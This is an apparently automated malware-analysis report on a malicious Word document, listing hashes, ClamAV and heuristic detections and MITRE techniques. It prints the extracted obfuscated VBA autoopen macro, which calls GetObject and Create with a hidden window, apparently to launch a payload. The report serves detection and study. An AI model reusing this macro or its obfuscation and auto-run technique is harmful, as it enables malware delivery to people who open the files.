Office (OLE) malware analysis — malicious · bc2139ec6309f2f4

MALICIOUS

Office (OLE)

140.5 KB Created: 2019-03-19 19:21:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 16b21ff19046f6465fb1f1cafcb0042b SHA-1: b652f03bb907a21e9605ca43651d5077ddecc0f0 SHA-256: bc2139ec6309f2f44829ec98dfb28c4c498646469d1332dfc7f3927411f6af07

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The 'autoopen' subroutine is present and uses the GetObject function, indicating an attempt to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Malware.Drvb-6902289-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11466 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11466 bytes
SHA-256: `28e3a5c2a3151deacd386b8141567217489a1e11f40044bc3d741e6092ee2453`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rXDoUA1D" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WZA_U1B" Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "wAAcAZ" Sub autoopen() On Error Resume Next If jwQX_AQ = bQAAUAXQ Then wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx) End If If E4UADQ = ak1QDxA Then A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA) End If Set TXABkB = GetObject(WZA_U1B.wAAXcA) If lABABAXA = DAZABX Then lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k) End If If wkAZQBXG = kQwcAx Then FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4) End If If wAZA_o = z1CGAo Then YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U) End If TXABkB.ShowWindow = 709285 - 709285 If HkAQ1A = qQcc4Q Then wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA) End If If fQDAGCZ = q1BAAUC Then cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA) End If GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA If ECAU4QA = JAwBDA Then IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4) End If If jBUABCZA = zA4UDw4 Then DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax) End If If ix1GoDA = no1BADQ1 Then PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA) End If End Sub ' Processing file: /opt/analyzer/scan_staging/699c3aeabc084eaaa63186b5c15b2905.bin ' =============================================================================== ' Module streams: ' Macros/VBA/rXDoUA1D - 1106 bytes ' Macros/VBA/WZA_U1B - 1158 bytes ' Macros/VBA/wAAcAZ - 5100 bytes ' Line #0: ' FuncDefn (Sub wAAcAZ()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Ld autoopen ' Ld jwQX_AQ ' Eq ' IfBlock ' Line #3: ' LitDI4 0xDC84 0x042C ' LitDI4 0x637D 0x1C10 ' LitDI4 0x3545 0x18B1 ' ArgsLd Round 0x0001 ' Mul ' Ld wBGXc1 ' Add ' Ld Q11Ux1 ' ArgsL ... (truncated)

SHA-256: 28e3a5c2a3151deacd386b8141567217489a1e11f40044bc3d741e6092ee2453

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
   If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
   If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
   If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
   If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
   If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
TXABkB.ShowWindow = 709285 - 709285
   If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
   If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
   If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
   If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
   If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/699c3aeabc084eaaa63186b5c15b2905.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' 	FuncDefn (Sub wAAcAZ())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld jwQX_AQ 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0xDC84 0x042C 
' 	LitDI4 0x637D 0x1C10 
' 	LitDI4 0x3545 0x18B1 
' 	ArgsLd Round 0x0001 
' 	Mul 
' 	Ld wBGXc1 
' 	Add 
' 	Ld Q11Ux1 
' 	ArgsL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.